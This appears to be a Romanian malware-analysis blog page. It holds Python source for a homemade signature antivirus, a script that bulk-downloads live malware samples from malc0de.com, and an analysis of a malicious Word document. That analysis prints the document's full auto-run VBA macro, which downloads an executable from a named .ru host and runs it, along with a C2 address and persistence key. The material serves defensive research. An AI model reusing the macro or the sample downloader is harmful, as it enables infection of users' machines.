Skip to content

Malware analysis

looking for the perfect virus
Marmota Antivirus v6.0

Marmota Antivirus 6

Marmota Antivirus v6.0

Marmota Antivirus 6.0

Licenta de utilizare:
Acest script este distribuit “asa cum este” fara nici o garantie, il utilizati pe propria dumneavoastra raspundere.
“Marmota Antivirus 6″ poate fi utilizat in mod gratuit de orice persoana strict in scop personal (NO money involved).

License:
No warranty express or implied.
Free to use if you don’t use-it to gain money.

#
import argparse
import os
import time
import sys
import ctypes
import re
import hashlib
from _winreg import *
import wmi
import win32api
c = wmi.WMI ()

ok="ok"
logo = """
\t                                        _          
\t /'\_/`\ AntiVirus VI                  ( )_        
\t |     |   _ _  _ __   ___ ___     _   | ,_)   _ _ 
\t | (_) | /'_` )( '__)/' _ ` _ `\ /'_`\ | |   /'_` )
\t | | | |( (_| || |   | ( ) ( ) |( (_) )| |_ ( (_| |
\t (_) (_)`\__,_)(_)   (_) (_) (_)`\___/'`\__)`\__,_)
\t http://virii.tk         http://twitter.com/ViRiiTk
"""

#color print, credits: http://stackoverflow.com/a/11193790
STD_OUTPUT_HANDLE = -11 
stdout_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
setconsoletextattrib = ctypes.windll.kernel32.SetConsoleTextAttribute
def color_print(text, culoare):
    setconsoletextattrib(stdout_handle, culoare)
    print text
    setconsoletextattrib(stdout_handle, 0x7)

#parsing arguments
parser = argparse.ArgumentParser(description= color_print(str(logo), 0xA))
parser.add_argument("-s", "--scan", metavar="DIR", default = os.getcwd(),
                    help="Scan directory (default: current dir)")

parser.add_argument("-d", "--deep", action="store_true",
                    help="Enable deep scan")

parser.add_argument("-f", "--fast", action="store_true",
                    help="Enable fast scan")
args = parser.parse_args()

if not args.deep and not args.fast:
    exit(raw_input(color_print("No scan enabled, try: %s -h" %(sys.argv[0].split("\\")[-1]),0xC)))
if not os.path.isdir(args.scan):
    exit(raw_input(color_print(("%s is not a dir, try: %s -h" %(args.scan, sys.argv[0].split("\\")[-1])), 0xC)))		

#global vars
totalfisiere  = 0  
L_f_nescanate = []  # list with files that can't be scanned
L_f_infected  = []  # list with infected files

def logs(bug):
    with open("logs.txt", "a") as loguri:
        loguri.write("\n"+ str(bug))
        loguri.close()

#start logging
temp = time.strftime("%c")
temp += "\n" + args.scan
temp += "\tDeep scan: " + ("Yes" if args.deep else "No")
temp += "\tFast scan: " + ("Yes" if args.fast else "No")
logs(temp)
start = time.time()

print "Loading signatures..."
#loading signatures
fp  = [] #false positive
fs  = {} #file signatures
msd = {} #malware signature deep
msf = {} #malware signature fast

##false positive
print "False positive...", 
with open(os.getcwd()+r"\signatures\false_positive.txt", "r") as handle:
    for temp in handle.readlines():
        fp.append(temp.strip())
    handle.close()    
print ok

##file signatures
print "File signatures...",
with open(os.getcwd()+r"\signatures\file_signature.txt", "r") as handle:
    for temp in handle.readlines():
        temp = temp.split(":")
        fs[temp[0]] = temp[1].strip()
    handle.close()
        
for ext in fs.keys():
    if ext not in msd.keys():
        msd[ext] = {}
    if ext not in msf.keys():
        msf[ext] = {}
print ok

##deep scan signatures {"ext1"= {"name":"signature"}, "ext2":{"malname":"signature"}}
if args.deep:
    print "Deep scan...",
    with open(os.getcwd()+r"\signatures\deep_scan.txt", "r") as handle:
        for temp in handle.readlines():
            temp = temp.split(":")
            if temp[0][:3] in msd.keys():
                msd[temp[0][:3]][temp[0][3:]]= temp[1].strip()
        handle.close()
    print ok    

##fast scan signatures {"ext1"= {"name":"signature"}, "ext2":{"malname":"signature"}}
if args.fast:
    print "Fast scan...",
    with open(os.getcwd()+r"\signatures\fast_scan.txt", "r") as handle:
        for temp in handle.readlines():
            temp = temp.split(":")
            if temp[0][:3] in msf.keys():
                msf[temp[0][:3]][temp[0][3:]]= temp[1].strip()
        handle.close()
    print ok

def md5Checksum(filePath):
    fh = open(filePath, 'rb')
    m = hashlib.md5()
    while True:
        data = fh.read(8192)
        if not data:
            break
        m.update(data)
    return m.hexdigest()

def killproc(pid):
    PROCESS_TERMINATE = 1
    handle = win32api.OpenProcess(PROCESS_TERMINATE, False, pid)
    win32api.TerminateProcess(handle, -1)
    win32api.CloseHandle(handle)

#fast scan
def engine_fast(testfile): 
    a = open(testfile, "rb")
    
    for extfisier in fs.keys():            #exe:00024D5A
        temp = fs[extfisier]                 #temp = 00024d5a
        amp_off = int(temp[0:2], 16)         # =00
        amp_len = int(temp[2:4], 16)         # =02
        amp     = temp[4:(4+ 2*amp_len)]     # 4d5a
        a.seek(amp_off)
        amprenta_citita = a.read(amp_len).encode("hex")
        
        if re.match(amp, amprenta_citita, re.IGNORECASE):
            malware = msf[extfisier]
            
            for malkey in malware.keys(): #Trojan-RAT 2.8000006040A:6F780049276D20616C69
                try:
                    sig_len = int(malkey[-2:], 16)      # 0A
                    sig_off = int(malkey[-10:-2], 16)   # 00000604
                    sig_num = malkey[0:-10]             # Trojan-RAT 2.8
                    semnaturamalware = malware[malkey]  # 6F780049276D20616C69
                except: # daca semnatura este gresita, este eliminata din dictionar
                    del malware[malkey] 
                    
                a.seek(sig_off)
                continut = a.read(sig_len).encode("hex")
                test = re.match(semnaturamalware, continut, re.IGNORECASE)# cauta semnatura
                
                if test : #daca a fost gasita semnatura
                    if md5Checksum(testfile) in fp : # verifica false positive
                        color_print(("FP->\t" + str(sig_num) + "\t" + str(testfile)), 0xB)
                        return 0
                    else:
                        color_print(("\t" + str(sig_num) + "\t" + str(testfile)), 0xC)
                        logs("\t" + sig_num + "\t" + testfile )
                        return sig_num
    a.close()    
    return 0

#deep scan
# Boyer Moore String Search implementation in Python https://gist.github.com/ameerkat/626643
# Ameer Ayoub <ameer.ayoub@gmail.com>
# Generate the Bad Character Skip List
def generateBadCharShift(term):
    skipList = {}
    for i in range(0, len(term)-1):
        skipList[term[i]] = len(term)-i-1
    return skipList
 
# Generate the Good Suffix Skip List
def findSuffixPosition(badchar, suffix, full_term):
    for offset in range(1, len(full_term)+1)[::-1]:
        flag = True
        for suffix_index in range(0, len(suffix)):
            term_index = offset-len(suffix)-1+suffix_index
            if term_index < 0 or suffix[suffix_index] == full_term[term_index]:
                pass
            else:
                flag = False
        term_index = offset-len(suffix)-1
        if flag and (term_index <= 0 or full_term[term_index-1] != badchar):
            return len(full_term)-offset+1
 
def generateSuffixShift(key):
    skipList = {}
    buffer = ""
    for i in range(0, len(key)):
        skipList[len(buffer)] = findSuffixPosition(key[len(key)-1-i], buffer, key)
        buffer = key[len(key)-1-i] + buffer
    return skipList
    
# Actual Search Algorithm
def BMSearch(haystack, needle):
    goodSuffix = generateSuffixShift(needle)
    badChar = generateBadCharShift(needle)
    i = 0
    while i < len(haystack)-len(needle)+1:
        j = len(needle)
        while j > 0 and needle[j-1] == haystack[i+j-1]:
            j -= 1
        if j > 0:
            badCharShift = badChar.get(haystack[i+j-1], len(needle))
            goodSuffixShift = goodSuffix[len(needle)-j]
            if badCharShift > goodSuffixShift:
                i += badCharShift
            else:
                i += goodSuffixShift
        else:
            return i
    return -1
#end

def engine_deep(testfile): 
    a = open(testfile, "rb")
    
    for extfisier in fs.keys():            #exe:00024D5A
        temp = fs[extfisier]                 #temp = 00024d5a
        amp_off = int(temp[0:2], 16)         # =00
        amp_len = int(temp[2:4], 16)         # =02
        amp     = temp[4:(4+ 2*amp_len)]     # 4d5a
        a.seek(amp_off)
        amprenta_citita = a.read(amp_len).encode("hex")
        
        if re.match(amp, amprenta_citita, re.IGNORECASE):
            a.seek(0)
            malware = msd[extfisier]
            fisier = a.read()
            
            for i in malware.keys():
                semnatura = malware[i].decode("hex")
                rezultatscan = BMSearch(fisier, semnatura)
                
                if rezultatscan != -1: # daca a fost identificata semnatura
                    if md5Checksum(fullpath) not in fp: 
                        color_print(("\t" + str(i) + "\t" + str(testfile)), 0xC)
                        logs("\t" + str(i) + "\t" + testfile)
                        return 1
                    else :
                        color_print(("FP->\t" + str(i) + "\t" + str(testfile)), 0xB)
                        break
    a.close()
    return 0
            
#file listing
print "Searching signatures..."
logs("Scanning files:")
for root, subFolders, files in os.walk(args.scan):
    for file in files:
        fullpath = os.path.join(root, file)
        totalfisiere += 1
        
        if args.deep: 
            try:
                scan_deep = engine_deep(fullpath)
                if scan_deep != 0:                            
                    L_f_infected.append(fullpath)                
            except Exception as e:
                logs(fullpath + "\t" + str(e))
                L_f_nescanate.append(fullpath)
                
        if args.fast:
            try:
                scan_fast = engine_fast(fullpath)
                if scan_fast != 0:                            
                    L_f_infected.append(fullpath)
            except Exception as e:
                logs(fullpath + "\t" + str(e))
                L_f_nescanate.append(fullpath)

#remove duplicates
L_f_infected  = list(set(L_f_infected))
L_f_nescanate = list(set(L_f_nescanate))

print "Search and kill infected processes..."
logs("Killing running malware:")
for f_path in L_f_infected:
    for process in c.Win32_Process():
        match = unicode(process.CommandLine).find(unicode(f_path))
        
        if match != -1:
            color_print("\t" + str(f_path.split("\\")[-1]) + "\t"+ str(process.ProcessId), 0xC)
            
            if killproc(process.ProcessId) == None:
                color_print(("\t" + str(process.ProcessId) + "\t...killed"), 0xA)
                logs("\t" + str(f_path.split("\\")[-1]) +"\t" + str(process.ProcessId) + "\t...killed")
                
            else:
                color_print(("\t" + "Processul: " + str(process.ProcessId) + "nu a putut fi inchis"), 0xC)
                logs("\t" + str(f_path.split("\\")[-1]) +"\t" + str(process.ProcessId) + "nu a putut fi inchis")

#removing persistence
print "Scanare persistence (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run)..."
logs("Deleting persistence entries:")
for f_path in L_f_infected:
    aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
    aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
    
    for i in range(1024):                                           
        try:
            n,v,t = EnumValue(aKey,i)
            mineru = unicode(v).find(unicode(f_path))
            if mineru != -1 :
                color_print(("\t" + str(n) + "\t" + str(v)), 0xC)
                CloseKey(aKey)
                
                #deleting persistence 
                aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
                if DeleteValue(aKey, n) == None: 
                    color_print(("\t" + str(v) + " removed"), 0xA)
                    logs("\t" + str(v) + " removed")
                else: 
                    color_print(("\t" + str(v) + " can't delete persistence"), 0xA)
                    logs("\t" + str(v) + " can't delete persistence")
                CloseKey(aKey)
                
        except EnvironmentError:                                               
            break

#rename infected files
print "Anihilating infected files..."
logs("Renaming infected files:")
for f_path in L_f_infected:
    numefisier = f_path.split("\\")[-1]
    renamefile = os.system("rename " + '"' + f_path +'" ' +'"'+ numefisier + ".vir" + '"')
    
    if renamefile == 0:
        color_print(("\t" + f_path + " --> " + numefisier + ".vir"), 0xA)
        logs("\t" + f_path + " --> " + numefisier + ".vir")

#scan time
stop = time.time()
timp = int(stop - start)
h = timp / 3600
resth = timp - h * 3600
m = resth /60
s = resth - m * 60

#feedback
logs("Total fisiere scanate: %s" %(totalfisiere)) 
logs("Nu am putut scana fisierele:")
for i in L_f_nescanate:
    logs("\t" + str(i))  
logs("Scan time: h:%i min:%i s:%i" %(h,m,s))
logs("===END===\n")

Download: http://ge.tt/api/1/files/3CRt7zq1/0/blob?download
File: MarmotaAntivirus6.zip
MD5: 870f0458c3aac1ce83986f1ce82b3058
SHA-1: 561f334bfafd440b354c56fe40e6d30179a6fdb1

Malc0de.com samples downloader options/help

Malc0de.com samples downloader help/options

Malc0de.com samples downloader  usage example

Malc0de.com samples downloader usage example

License:
– no warranty express or implied
– free to use if you don’t use-it to gain money

Warning: Downloaded files can damage you computer. 

import re
import time
import urllib2
import hashlib
import os
import random
import Queue
import threading
import argparse

print """
Malc0de.com samples downloader v3.3
               )\._.,--....,'``.       
  .b--.        /;   _.. \   _\  (`._ ,. 
 `=,-,-'~~~   `----(,_..'--(,_..'`-.;.'
http://virii.tk    http://twitter.com/ViRiiTk
"""

parser = argparse.ArgumentParser(description="Malc0de.com samples downloader v3.3")

parser.add_argument("nr_samples", type=int,
                    help= "Number of samples you want to download")

parser.add_argument("-t", "--nr_threads", metavar="threads", type=int, default=200, 
                    help= "Threads number (Default: 200)")

parser.add_argument("-a", "--agent", default="Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
                    help= "User Agent used to download samples")

parser.add_argument("-d", "--dldfolder", default = "C:\malware\\",
                    help= "Local folder to download samples (Default: C:\malware\\ )")

parser.add_argument("-i", "--info", default = "_files.txt",
                    help = "file to store info about downloaded samples (Default: _files.txt)")

parser.add_argument("-e", "--error", default = "_errors.txt",
                    help = "file to store errors (Default: _errors.txt)")

parser.add_argument("-u", "--malurl", default = "_mal_url.txt",
                    help = "file to store malware urls (Default: _mal_url.txt)")
args = parser.parse_args()

#create download folder if not exist
if not os.path.isdir(args.dldfolder):
    os.mkdir(args.dldfolder)

#limit the number of download samples
if args.nr_samples > 10000:
    print "You need very Very VERY many samples, 5k is enough for you"
    args.nr_samples = 4999    

if args.nr_threads >= args.nr_samples:
    args.nr_threads = args.nr_samples
    
print "Try to download latest %i samples" %(args.nr_samples)
print "Threads: %i" %(args.nr_threads) 
print "Malware samples will be downloaded to %s" %(args.dldfolder), "\n" 

#construct user agents
dldagent = {'User-Agent' : args.agent}
useragent = { 'User-Agent' : 'Malc0de.com samples downloader v3.3 http://ViRii.Tk'}

#queue
q = Queue.Queue()

#generate random string
def get_random_word(a):
    word = ''
    for i in range(a):
        word += random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789')
    return word

#md5 file
def md5Checksum(filePath):
    fh = open(filePath, 'rb')
    m = hashlib.md5()
    while True:
        data = fh.read(8192)
        if not data:
            break
        m.update(data)
    return m.hexdigest()

#nr paginilor ce trebuie vizitate
counter = 0 
if args.nr_samples % 50 == 0:
    pages = args.nr_samples / 50
else :
    pages = (args.nr_samples / 50) + 1

#find all malware address on curent page
def getmalware(pagina):
    global counter
    b = re.findall("<td>[\d]{4}-[\d]{2}-[\d]{2}<\/td>\n.+\n", pagina)
    if b:
        for i in b:
            data = re.search("<td>([\d]{4}-[\d]{2}-[\d]{2})<\/td>", i)
            malware = re.search("\t<td>(.+)<\/td>", i)
            if data and malware:
                malware= re.sub("<br\/>", "",malware.group(1) )
                #print data.group(1), malware
                if counter >= args.nr_samples:
                    return
                else:
                    q.put(malware) 
                    counter += 1
#browsing pages
print "Browsing pages:"
for i in range(1, pages + 1):
    
    adresa = "http://malc0de.com/database/?&page=" + str(i)
    print "Searching on:", adresa
    time.sleep(3) # pauza intre pagini (s)
    
    try:
        req = urllib2.Request(adresa, None, useragent)
        response = urllib2.urlopen(req)
        continut = response.read()
        getmalware(continut)    
    except Exception as e:
        print e
        pass
    
def dld_mal(url_mal):
    #downloading malware samples
        
    #write address of this sample
    with open(args.dldfolder + args.malurl, "a") as handle:
        handle.write(url_mal + "\n")
        handle.close()
        
    #get file name    
    file_name = url_mal.split("/")[-1]
    
    #remove bad characters from file name
    if len(file_name)==0 or re.search("\?", file_name) or re.search("\&", file_name):
        file_name =  "No_name" + str(get_random_word(8))
        
    #try to download sample   
    try:
        #check if url start with "http://
        if url_mal[:7] != "http://":
            url_mal = "http://" + url_mal
        
        #construct url and set timeout
        url_construct = urllib2.Request(url_mal, None, dldagent)
        u = urllib2.urlopen(url_construct, timeout = 59) #timeout 1 min
        
        # every downloaded malware will have a uniq name: "Malware_sample" + "_" + 3 random characters
        f_name = args.dldfolder + str(file_name) +"_" + get_random_word(3) 
        
        #write to file
        f = open(f_name, 'wb')
        block_sz = 8192
        while True:
            buffer = u.read(block_sz)
            if not buffer:
                break
            f.write(buffer)
        f.close()
        
        #write info to _files.txt
        with open(args.dldfolder + args.info, "a") as handle:
            md5hash = md5Checksum(f_name)
            handle.write(str(md5Checksum(f_name)) +"\t" + str(file_name)+ "\t" + url_mal + "\n")
            handle.close
            
        print "\n" + "Am descarcat: " + file_name,
    except Exception as e:
        #adding error to _errors.txt
        with open(args.dldfolder + args.error, "a") as handle:
            handle.write(url_mal + "\t" + str(e) + "\n")
            handle.close()
        pass

print "Downloading:",
def worker():
    while True:
        if not q.empty():
            item = q.get()
            dld_mal(item)
            q.task_done()

for i in range(args.nr_threads):
    t = threading.Thread(target=worker)
    t.daemon = True
    t.start()

q.join()
exit()

Previous version: http://virii.tk/python-malc0de-com-samples-downloader-v3-0/

File: Fiscal Activity.Doc
Size:37.0 KB (37,888 bytes)
MD5: 7a7a281d66cce2a3ab2b92cdbf7b7e33
SHA-1: 9f0998fcec88bd6d8e016dda1ff75e3d03f05398

Antivirus detection:

MD5: 7a7a281d66cce2a3ab2b92cdbf7b7e33
Scan Result: 7/34
Verified By NoDistribute: http://NoDistribute.com/result/8LcPIJXQ4iSba9

AVG Free: Clean
Avast: Clean
AntiVir (Avira): Clean
BitDefender:W97M.Downloader.X
Clam Antivirus: Clean
COMODO Internet Security: Clean
Dr.Web:W97M.DownLoader.55
eTrust-Vet: Clean
F-PROT Antivirus:W97M/Bernie.B (exact)
F-Secure Internet Security: Clean
G Data:W97M.Downloader.X
IKARUS Security: Clean
Kaspersky Antivirus: Clean
McAfee: Clean
MS Security Essentials:TrojanDownloader:W97M/Orgen.A
Norman: Clean
Norton Antivirus: Clean
Panda Security: Clean
A-Squared:Trojan-Downloader.MSWord.Agent (A)
Quick Heal Antivirus: Clean
Solo Antivirus: Clean
Sophos:WM97/DwnLdr-LTS
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
BullGuard: Clean
FortiClient: Clean
K7 Ultimate: Clean
NANO Antivirus: Clean
Panda CommandLine: Clean
SUPERAntiSpyware: Clean
Twister Antivirus: Clean
VIPRE: Clean
file content and macro warning

file content and macro warning

seems that need a little help to run the embeded macro:

Sub Auto_Open()
    v45
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
Sub v45()
Dim fu3ygF As String
Dim wFEf2cbw As Integer
Dim FU348d As Integer
Dim oShell
Set oShell = CreateObject("WScript.Shell")
suka = "http://moviebernie1996.ru/u.exe"
Dim X2: Set X2 = CreateObject("Adodb.Stream")
Dim Ff8778Frgh: Set Ff8778Frgh = CreateObject("MSXML2.XMLHTTP.6.0")
fu3ygF = Environ("USERSPROFILE")
Ff8778Frgh.Open "GET", suka, False
Ff8778Frgh.Send
With X2
.Type = 1
.Open
.write Ff8778Frgh.responseBody
.SaveToFile fu3ygF & "\GHJCJ.ScR", 2
End With
strCmd = fu3ygF & "\GHJCJ.ScR"
oShell.Run (strCmd)
Set oShell = Nothing
End Sub

Conform scriptului macro de mai sus ar fi trebuit sa descarce u.exe, sa-l salveze ca GHJCJ.ScR si sa-l lanseze in executie din linia de comanda

File: GHJCJ.ScR
Size: 542 KB (555,008 bytes)
MD5: 1abf320c81bd2d53fccf948eb5d53c13
SHA-1: ce769228ebd1ad060e6148708be8429fb888e915
selfdelete

file details

file details

CompanyName: ThreatTrack Security, Inc
FileDescription: Hewlett-Packard
LegalCopyright: Disc Soft Ltd
LegalTrademarks: TODO:
ProductName: MetaGeek, LLC
FileVersion: 3.05.0006
ProductVersion: 3.05.0006
InternalName: Emmesteroyichmt
OriginalFilename: Emmesteroyichmt.exe

Antivirus detection:

MD5: 1abf320c81bd2d53fccf948eb5d53c13
Scan Result: 5/34
Verified By NoDistribute: http://NoDistribute.com/result/otNfG1SlqgihVu

AVG Free: Clean
Avast: Clean
AntiVir (Avira): Clean
BitDefender:Trojan.GenericKD.1790146
Clam Antivirus: Clean
COMODO Internet Security: Clean
Dr.Web:Trojan.PWS.Grabber.196
eTrust-Vet: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security: Clean
G Data:Trojan.GenericKD.1790146
IKARUS Security: Clean
Kaspersky Antivirus: Clean
McAfee:Artemis!1ABF320C81BD
MS Security Essentials: Clean
Norman: Clean
Norton Antivirus: Clean
Panda Security: Clean
A-Squared:Trojan.GenericKD.1790146 (B)
Quick Heal Antivirus: Clean
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
BullGuard: Clean
FortiClient: Clean
K7 Ultimate: Clean
NANO Antivirus: Clean
Panda CommandLine: Clean
SUPERAntiSpyware: Clean
Twister Antivirus: Clean
VIPRE: Clean

process:
GHJCJ.ScR
inject into svchost.exe

new files:
c:\Documents and Settings\Administrator\Application Data\{F4FB5998-0F40-A600-D000-D594C14F4D}\
A179M9wQ.dat
bglmrsxyej.exe MD5: 1abf320c81bd2d53fccf948eb5d53c13
hsbccfs
JVTt0jhf.dat
wode

network activity:
178.18.19.123/x0rz/edit.php
testeaza in prealabil conexiunea la internet accesand google.com/webhp

persistence:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
{F4FB5998-0F40-A600-D000-D594C14F4D} “C:\Documents and Settings\Administrator\Application Data\{F4FB5998-0F40-A600-D000-D594C14F4D}\bglmrsxyej.exe”